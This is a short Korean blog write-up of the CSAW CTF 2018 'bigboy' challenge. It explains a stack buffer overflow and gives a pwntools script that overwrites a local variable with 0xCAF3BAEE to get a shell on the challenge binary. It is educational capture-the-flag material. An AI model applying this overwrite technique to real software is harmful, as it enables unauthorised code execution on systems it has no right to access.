ii4gsp

CSAW CTF 2018 Quals - bigboy 본문

시스템 해킹/CTF

CSAW CTF 2018 Quals - bigboy

ii4gsp 2020. 3. 3. 21:16

read()함수로 buf에 24byte만큼 입력을받는다.

v6가 0xCAF3BAEE 이면, 쉘을 획득한다.

 

 

 

 

from pwn import *

p = process('/home/ii4gsp/boi')

payload = ''
payload += '\x90' * 20
payload += p64(0xCAF3BAEE)

p.sendline(payload)

p.interactive()

 

 

 

 

간단

'시스템 해킹 > CTF' 카테고리의 다른 글

Angstrom CTF 2019 - Aquarium  (0) 2020.03.04
CSAW CTF 2018 Quals - get_it?  (0) 2020.03.03
SSG_CTF - SimpleBOF  (0) 2020.02.25
[DEFCON 2015] r0pbaby  (0) 2020.02.20
[CODEGATE 2018] BaskinRobbins31  (0) 2020.02.20
Comments